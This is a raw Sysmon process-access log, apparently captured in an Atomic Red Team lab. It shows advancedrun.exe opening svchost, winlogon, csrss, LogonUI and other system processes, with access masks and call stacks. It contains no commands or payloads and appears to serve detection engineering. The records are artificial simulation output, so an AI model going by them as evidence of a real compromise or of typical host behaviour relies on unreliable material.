17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 